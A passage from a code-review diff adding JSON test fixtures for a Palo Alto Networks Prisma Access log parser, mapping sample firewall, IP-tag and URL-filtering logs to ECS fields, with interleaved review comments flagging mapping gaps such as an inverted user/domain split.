"xxxxxxxxxxxxxx", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "xxxxxxxxxxxxxx" + } + }, + "related": { + "hosts": [ + "PA-5220" + ], + "ip": [ + "1.1.1.1" + ], + "user": [ + "xxxxx xxxxx" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1", + "user": { + "name": "xxxxx xxxxx" + } + }, + "user": { + "name": "xxxxx xxxxx" + } + } +} \ No newline at end of file 
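Review bot: For a HIP-match record the security-relevant asset is the endpoint, yet the expectation maps `host.*` and `related.hosts` to the firewall (`dvchost=PA-5220`) and drops `shost=machine_name1`/`dhost=machine_name1`, `cs2=iOS` (EndpointOSType), `cat=match_name1` (the matched HIP object) and the `c6a1` device IPv6 address. Without the machine name and HIP profile name an analyst cannot tell which device passed or failed posture, which is what this log type is consumed for. I would map `shost` to `host.name`/`host.hostname` (moving the firewall into `observer.hostname`), `cs2` to `host.os.name`, `cat` to `rule.name` or a `paloalto.hip.match_name` field, and add `machine_name1` to `related.hosts`; `PanOSSourceUser`, which carries the domain prefix, is also ignored in favour of `suser`, so `user.domain` is lost. The expectation as written cannot verify any of this, so I would extend the fixture rather than accept it as-is.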
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json new file mode 100644 index 000000000..e4e153224 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json 
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "<14>Sep 16 10:00:02 PP 1,9/16/19 10:00,1801017000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,1.2.3.4,10.0.1.2,PING,,,ping,vsys,AAAAA,Zone1,ethernet1/1,ae2.11,Secure,9/16/19 10:00,24100,3,0,0,0,0,0x500000,icmp,allow,222,222,0,3,9/16/19 10:00,0,any,0,50660388939,0x0,Spain,France,0,3,0,n/a,0,0,0,0,,PA,from-policy,,,0,,0,,N/A,0,0,0,0" + }, + "expected": { + "message": "<14>Sep 16 10:00:02 PP 1,9/16/19 10:00,1801017000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,1.2.3.4,10.0.1.2,PING,,,ping,vsys,AAAAA,Zone1,ethernet1/1,ae2.11,Secure,9/16/19 10:00,24100,3,0,0,0,0,0x500000,icmp,allow,222,222,0,3,9/16/19 10:00,0,any,0,50660388939,0x0,Spain,France,0,3,0,n/a,0,0,0,0,,PA,from-policy,,,0,,0,,N/A,0,0,0,0", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "traffic", + "duration": 0, + "outcome": "success", + "type": [ + "start" + ] + }, + "@timestamp": "2019-09-16T10:00:00Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "4.3.2.1", + "bytes": 0, + "ip": "4.3.2.1", + "nat": { + "ip": "10.0.1.2", + "port": 0 + }, + "packets": 0, + "port": 0 + }, + "log": { + "hostname": "PA", + "logger": "traffic" + }, + "network": { + "application": "ping", + "bytes": 222, + "packets": 3, + "transport": "icmp" + }, + "observer": { + "name": "PA", + "product": "PAN-OS", + "serial_number": "1801017000" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys" + }, + "related": { + "ip": [ + "1.2.3.4", + "10.0.1.2", + "4.3.2.1" + ] + }, + "rule": { + "name": "PING" + }, + "source": { + "address": "1.2.3.4", + "bytes": 222, + "ip": "1.2.3.4", + "nat": { + "ip": "1.2.3.4", + "port": 0 + }, + "packets": 3, + "port": 0 + } + } +} \ No newline at end of file 
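Review bot: The source/destination location columns (`Spain`, `France`) are dropped from the expectation, while the GlobalProtect CSV fixtures in this commit map the same kind of PAN-OS region column into `source.geo.country_iso_code`; the traffic and GlobalProtect paths should agree on how region values are handled. Because PAN-OS emits country names here, two-letter codes elsewhere and private-range labels (`10.0.0.0-10.255.255.255` in `fix_bug_with_int.json`), the safe shape is `source.geo.country_name`/`destination.geo.country_name` for names and `country_iso_code` only for values that are genuinely alpha-2 codes. If the omission on the traffic path is deliberate, a one-line comment on the parser stage saying traffic geo columns are intentionally not mapped would stop the next reader treating it as a gap. Also `event.duration: 0` is taken from the elapsed column, which PAN-OS reports in seconds whereas ECS `event.duration` is nanoseconds — harmless at zero, but the conversion belongs in the parser.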
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json new file mode 100644 index 000000000..9d2db872a --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json 
@@ -0,0 +1,59 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|IPTAG|iptag|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:20:13 deviceExternalId=xxxxxxxxxxxxx PanOSTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSetting= PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSRuleMatched= PanOSRuleMatchedUUID= PanOSConfigVersion= start=Mar 01 2021 21:20:13 cs3=vsys1 cs3Label=VirtualLocation src=1.1.1.1 dst=1.1.1.1 PanOSTagName= PanOSEventID=Unregister cnt=1 PanOSMappingTimeout=10 PanOSMappingDataSource=XMLAPI PanOSMappingDataSourceType=XML-API PanOSMappingDataSourceSubType=Unknown externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=18 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-VM cn2=1 cn2Label=VirtualSystemID PanOSIPSubnetRange= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|IPTAG|iptag|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:20:13 deviceExternalId=xxxxxxxxxxxxx PanOSTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSetting= PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSRuleMatched= PanOSRuleMatchedUUID= PanOSConfigVersion= start=Mar 01 2021 21:20:13 cs3=vsys1 cs3Label=VirtualLocation src=1.1.1.1 dst=1.1.1.1 PanOSTagName= PanOSEventID=Unregister cnt=1 PanOSMappingTimeout=10 PanOSMappingDataSource=XMLAPI PanOSMappingDataSourceType=XML-API PanOSMappingDataSourceSubType=Unknown externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=18 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-VM cn2=1 cn2Label=VirtualSystemID PanOSIPSubnetRange= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12", + "event": { + "category": [ + "network" 
+ ], + "dataset": "iptag", + "severity": 3, + "start": "2021-03-01T21:20:13Z", + "timezone": "UTC", + "type": [ + "info" + ] + }, + "@timestamp": "2021-03-01T21:20:13Z", + "action": { + "type": "iptag" + }, + "destination": { + "address": "1.1.1.1", + "ip": "1.1.1.1" + }, + "host": { + "hostname": "PA-VM", + "id": "xxxxxxxxxxxxx", + "name": "PA-VM" + }, + "log": { + "hostname": "PA-VM", + "logger": "iptag" + }, + "observer": { + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "VirtualLocation": "vsys1", + "VirtualSystemID": "1" + }, + "related": { + "hosts": [ + "PA-VM" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json new file mode 100644 index 000000000..d14918dab --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json 
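Review bot: `PanOSEventID=Unregister` is not mapped — the expectation has only `action.type: "iptag"` and no `action.name`/`event.action` — although the GlobalProtect CEF fixture in this commit maps `PanOSEventIDValue` to `action.name`. Register/unregister of an IP-to-tag mapping changes dynamic address group membership and therefore which policies apply to `1.1.1.1`, so a consumer that cannot see the verb cannot alert on unexpected tag removals. I would add `"name": "Unregister"` under `action` (and `event.action`), and also surface `PanOSMappingDataSource=XMLAPI` / `PanOSMappingDataSourceType=XML-API`, since tag changes pushed through the XML API rather than by User-ID agents are the ones worth auditing; `PanOSTagName` is empty in this sample, so a second fixture with a populated tag name would pin that mapping too.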
@@ -0,0 +1,106 @@ +{ + "input": { + "message": "{\"TimeReceived\": \"2024-06-25T21:32:54.000000Z\", \"DeviceSN\": \"000011111112222\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Rule124\", \"SourceUser\": null, \"DestinationUser\": null, \"Application\": \"ssl\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"INSIDE\", \"ToZone\": \"OUTSIDE\", \"InboundInterface\": \"ethernet1/2\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"Panorama_CDL\", \"SessionID\": 155600, \"RepeatCount\": 1, \"SourcePort\": 51501, \"DestinationPort\": 443, \"NATSourcePort\": 63989, \"NATDestinationPort\": 443, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.org\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7353954110769176067, \"SourceLocation\": \"AZURE-EU-WEST-CBS-BELLEM\", \"DestinationLocation\": \"NL\", \"ContentType\": null, \"PacketID\": 0, \"URLCounter\": 0, \"UserAgent\": null, \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 982, \"DGHierarchyLevel2\": 117, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"DN-EUWEST-F2\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"unknown\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \"computer-and-internet-info,low-risk\", \"RuleUUID\": \"cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": 
null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.103000Z\", \"NSSAINetworkSliceType\": null}" + }, + "expected": { + "message": "{\"TimeReceived\": \"2024-06-25T21:32:54.000000Z\", \"DeviceSN\": \"000011111112222\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Rule124\", \"SourceUser\": null, \"DestinationUser\": null, \"Application\": \"ssl\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"INSIDE\", \"ToZone\": \"OUTSIDE\", \"InboundInterface\": \"ethernet1/2\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"Panorama_CDL\", \"SessionID\": 155600, \"RepeatCount\": 1, \"SourcePort\": 51501, \"DestinationPort\": 443, \"NATSourcePort\": 63989, \"NATDestinationPort\": 443, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.org\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7353954110769176067, \"SourceLocation\": \"AZURE-EU-WEST-CBS-BELLEM\", \"DestinationLocation\": 
\"NL\", \"ContentType\": null, \"PacketID\": 0, \"URLCounter\": 0, \"UserAgent\": null, \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 982, \"DGHierarchyLevel2\": 117, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"DN-EUWEST-F2\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"unknown\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \"computer-and-internet-info,low-risk\", \"RuleUUID\": \"cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.103000Z\", \"NSSAINetworkSliceType\": null}", + "event": { + "action": "alert", + "category": [ + "network" + ], + "dataset": "threat", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-25T21:30:00Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "5.6.7.8", 
+ "domain": "www.example.org", + "geo": { + "country_iso_code": "NL" + }, + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "DN-EUWEST-F2", + "level": "Informational", + "logger": "threat" + }, + "network": { + "application": "ssl" + }, + "observer": { + "egress": { + "interface": { + "alias": "OUTSIDE" + } + }, + "ingress": { + "interface": { + "alias": "INSIDE" + } + }, + "name": "DN-EUWEST-F2", + "product": "PAN-OS", + "serial_number": "000011111112222" + }, + "paloalto": { + "DGHierarchyLevel1": "982", + "DGHierarchyLevel2": "117", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "DirectionOfAttack": "client to server", + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "www.example.org" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ] + }, + "rule": { + "name": "Rule124", + "uuid": "cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 63989 + }, + "port": 51501 + }, + "threat": { + "indicator": { + "name": "www.example.org" + } + }, + "url": { + "domain": "www.example.org", + "registered_domain": "example.org", + "subdomain": "www", + "top_level_domain": "org" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json new file mode 100644 index 000000000..e8c257c69 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json 
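Review bot: The expectation sets `threat.indicator.name: "www.example.org"` for a URL-filtering record whose category is `computer-and-internet-info,low-risk` with `Action: alert` — an allowed, benign page view. ECS `threat.indicator.*` describes intelligence indicators, and populating it for every browsed hostname makes any rule or enrichment keyed on `threat.indicator.name` fire on normal traffic; the hostname is already available in `url.domain`/`destination.domain`. I would restrict `threat.indicator.name` to subtypes that are actual detections (e.g. `vulnerability`, `virus`, `spyware`, `wildfire`) or to blocked verdicts, remove the `threat` object from this fixture, and keep the `URL` column in `url.original`, which the expectation currently lacks. Also `event.outcome: "success"` on a THREAT log with `alert` reads as "the threat succeeded"; the CEF threat fixture earlier in this diff records `alert` with no outcome, and I would follow that (or use `"unknown"`) rather than assert success.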
@@ -0,0 +1,128 @@ +{ + "input": { + "message": "{\"TimeReceived\": \"2024-06-25T21:30:08.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Global_Internet_Network_Awareness_Service\", \"SourceUser\": \"jdoe@example.org\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"ZR-EUWS-1\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.107\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1787364, \"RepeatCount\": 1, \"SourcePort\": 53610, \"DestinationPort\": 80, \"NATSourcePort\": 36160, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.com/connecttest.txt\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7372845116442397960, \"SourceLocation\": \"10.0.0.0-10.255.255.255\", \"DestinationLocation\": \"US\", \"ContentType\": \"text/plain\", \"PacketID\": 0, \"URLCounter\": 1, \"UserAgent\": \"Microsoft NCSI\", \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 525, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"ZR-EUWS-1\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"get\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \".msftconnecttest.com,computer-and-internet-info,low-risk\", \"RuleUUID\": \"481a523a-44c0-4c37-b2d5-b6b541d775c3\", 
\"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.778000Z\", \"NSSAINetworkSliceType\": null}" + }, + "expected": { + "message": "{\"TimeReceived\": \"2024-06-25T21:30:08.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Global_Internet_Network_Awareness_Service\", \"SourceUser\": \"jdoe@example.org\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"ZR-EUWS-1\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.107\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1787364, \"RepeatCount\": 1, \"SourcePort\": 53610, \"DestinationPort\": 80, \"NATSourcePort\": 36160, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.com/connecttest.txt\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": 
\"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7372845116442397960, \"SourceLocation\": \"10.0.0.0-10.255.255.255\", \"DestinationLocation\": \"US\", \"ContentType\": \"text/plain\", \"PacketID\": 0, \"URLCounter\": 1, \"UserAgent\": \"Microsoft NCSI\", \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 525, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"ZR-EUWS-1\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"get\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \".msftconnecttest.com,computer-and-internet-info,low-risk\", \"RuleUUID\": \"481a523a-44c0-4c37-b2d5-b6b541d775c3\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.778000Z\", \"NSSAINetworkSliceType\": null}", + "event": { + "action": "alert", + "category": [ + "network" + ], + "dataset": "threat", + 
"outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-06-25T21:30:00Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "5.6.7.8", + "domain": "www.example.com", + "geo": { + "country_iso_code": "US" + }, + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 80 + }, + "port": 80 + }, + "http": { + "request": { + "method": "get" + } + }, + "log": { + "hostname": "ZR-EUWS-1", + "level": "Informational", + "logger": "threat" + }, + "network": { + "application": "web-browsing" + }, + "observer": { + "egress": { + "interface": { + "alias": "untrust" + } + }, + "ingress": { + "interface": { + "alias": "ZR-EUWS-1" + } + }, + "name": "ZR-EUWS-1", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "ContentType": "text/plain", + "DGHierarchyLevel1": "463", + "DGHierarchyLevel2": "525", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "DirectionOfAttack": "client to server", + "Threat_ContentType": "url", + "URLCategory": "computer-and-internet-info", + "VirtualLocation": "vsys1" + }, + "related": { + "hosts": [ + "www.example.com" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "rule": { + "name": "Global_Internet_Network_Awareness_Service", + "uuid": "481a523a-44c0-4c37-b2d5-b6b541d775c3" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 36160 + }, + "port": 53610, + "user": { + "name": "jdoe@example.org" + } + }, + "threat": { + "indicator": { + "name": "www.example.com/connecttest.txt" + } + }, + "url": { + "domain": "www.example.com", + "path": "connecttest.txt", + "registered_domain": "example.com", + "subdomain": "www", + "top_level_domain": "com" + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + }, + "user_agent": { + "name": "Microsoft NCSI" + } + } +} \ No newline at 
end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json new file mode 100644 index 000000000..717e963a0 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json 
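Review bot: The expected output pins an inverted split of `SourceUser`: for the input value `jdoe@example.org` the fixture asserts `"user": {"domain": "jdoe", "email": "jdoe@example.org", "name": "example.org"}`, and `related.user` consequently lists `example.org` as if it were an account. That looks like a parser defect being locked in rather than a property worth asserting; the expected values should read `"domain": "example.org"`, `"name": "jdoe"`, with `related.user` as `["jdoe", "jdoe@example.org"]`, and the user-splitting stage (not part of this diff) fixed alongside. Minor: `url.path` is asserted as `connecttest.txt` without the leading slash, which will not match rules written against the usual `/path` form of ECS `url.path`; confirm whether that normalization is intended.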
@@ -0,0 +1,91 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|SCTP||9|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:22:02 deviceExternalId=xxxxxxxxxxxxx PanOSCaptivePortal= PanOSContentVersion= PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceMac= PanOSDestinationDeviceModel= PanOSDestinationDeviceOS= PanOSDestinationDeviceVendor= PanOSDestinationLocation=IN PanOSDestinationUUID= PanOSDestinationUserDomain=paloaltonetwork PanOSDestinationUserName=xxxxx PanOSDestinationUserUUID= PanOSInboundInterfaceDetailsPort=1 PanOSInboundInterfaceDetailsSlot=1 PanOSInboundInterfaceDetailsType=ethernet PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer= PanOSIsContainer= PanOSIsDecryptMirror= PanOSIsDecryptedLog= PanOSIsDecryptedPayloadForward= PanOSIsDuplicateLog=false PanOSIsIPV6= PanOSIsInspectrionBeforeSession= PanOSIsMptcpOn= PanOSIsNonStandardDestinationPort= PanOSIsPacketCapture= PanOSIsPhishing= PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy= PanOSIsReconExcluded= PanOSIsServertoClient= PanOSIsSourceXForwarded= PanOSIsSystemReturn= PanOSIsTransaction= PanOSIsTunnelInspected= PanOSIsURLDenied= PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT= PanOSOutboundInterfaceDetailsPort=2 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSSessionEndReason= PanOSSessionOwnerMidx= PanOSSessionTracker= PanOSSeverity=Critical PanOSSourceDeviceClass= PanOSSourceDeviceMac= PanOSSourceDeviceModel= PanOSSourceDeviceOS= PanOSSourceDeviceVendor= PanOSSourceLocation=US PanOSSourceUUID= PanOSSourceUserDomain=paloaltonetwork PanOSSourceUserName=xxxxx PanOSSourceUserUUID= PanOSTunnel=N/A PanOSVirtualSystemID=1 PanOSConfigVersion= start=Mar 01 2021 21:22:02 src=1.1.1.1 dst=1.1.1.1 PanOSNATSource=1.1.1.1 PanOSNATDestination=1.1.1.1 cs1=allow-business-apps cs1Label=Rule 
